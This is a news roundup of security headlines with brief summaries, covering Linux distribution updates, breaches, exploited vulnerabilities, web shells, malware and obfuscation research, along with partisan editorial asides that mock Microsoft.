news
Security Leftovers and Some FUD
-
LWN ☛ Security updates for Friday
Security updates have been issued by AlmaLinux (freerdp, grafana, kernel, rsync, and thunderbird), Debian (chromium, inetutils, and libpng1.6), Fedora (bind9-next, nginx-mod-modsecurity, and openbao), Mageia (firefox, nss and thunderbird), Red Hat (container-tools:rhel8), SUSE (conftest, dnsdist, ignition, libsoup, libsoup2, LibVNCServer, libXvnc-devel, opensc, ovmf-202602, perl-Crypt-URandom, python-tornado, python311-ecdsa, python311-Pygments, python315, tar, and wireshark), and Ubuntu (cairo, jpeg-xl, linux, linux-aws, linux-aws-6.17, linux-gcp, linux-gcp-6.17,
linux-hwe-6.17, linux-realtime, linux, linux-aws, linux-aws-hwe, linux-kvm, linux-oracle, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-ibm,
linux-lowlatency, linux-nvidia, linux-raspi, linux-fips, linux-fips, linux-aws-fips, linux-fips, linux-aws-fips, linux-gcp-fips, and linux-realtime, linux-realtime-6.8, linux-raspi-realtime).
-
Security Week ☛ In Other News: Abusive Monopolist Microsoft Chaffbot Data Leak, Android Rootkit, Water Facility Hit by Ransomware
Other noteworthy stories that might have slipped under the radar: Symantec vulnerability, anti-ClickFix mechanism added to macOS, FBI hack classified as major incident.
-
OpenSSF (Linux Foundation) ☛ Rethinking Post-Deployment Vulnerability Detection
-
Security Week ☛ North Korean Hackers Drain $285 Million From Drift in 10 Seconds
The attackers prepared infrastructure and multiple nonce-based transactions, took over an admin key, and drained five vaults.
-
Security Week ☛ T-Mobile Sets the Record Straight on Latest Data Breach Filing
The cybersecurity incident involved an insider and had a limited impact, the telecoms giant told SecurityWeek.
-
Security Week ☛ React2Shell Exploited in Large-Scale Credential Harvesting Campaign
Using automated scanning and the Nexus Listener collection framework, the hackers compromised over 750 systems.
-
Security Week ☛ Mobile Attack Surface Expands as Enterprises Lose Control
Shadow Hey Hi (AI) embedded in everyday apps, combined with outdated mobile devices and zero-click exploits, is creating a new and largely unseen mobile risk.
-
Security Week ☛ TrueConf Zero-Day Exploited in Asian Government Attacks
A Chinese threat actor exploited the video conferencing platform to perform reconnaissance, escalate privileges, and execute additional payloads.
-
Security Week ☛ Critical ShareFile Flaws Lead to Unauthenticated RCE
The vulnerabilities can be chained together to bypass authentication and upload arbitrary files to the server.
-
SANS ☛ TeamPCP Supply Chain Campaign: Update 006 - CERT-EU Confirms European Commission Cloud Breach, Sportradar Details Emerge, and Mandiant Quantifies Campaign at 1,000+ SaaS Environments, (Fri, Apr 3rd)
-
Trail of Bits ☛ Simplifying MBA obfuscation with CoBRA
Mixed Boolean-Arithmetic (MBA) obfuscation disguises simple operations like
x + ybehind tangles of arithmetic and bitwise operators. Malware authors and software protectors rely on it because no standard simplification technique covers both domains simultaneously; algebraic simplifiers don’t understand bitwise logic, and Boolean minimizers can’t handle arithmetic. -
Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments [Ed: When Microsoft covers "Linux"...]
-
Hacker News ☛ Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers [Ed: Microsoft looking for ways to demonise Linux instead of plugging Windows back doors]
Threat actors are increasingly using HTTP cookies as a control channel for PHP-based web shells on Linux servers and to achieve remote code execution, according to findings from the Microsoft Defender Security Research Team.
-
Chaos malware now targeting 64-bit Linux servers
In an April 2 blog post, the Darktrace researchers said this was the first documented example of Chaos targeting 64-bit Linux servers. Up until now, Chaos has only been able to target routers and edge devices.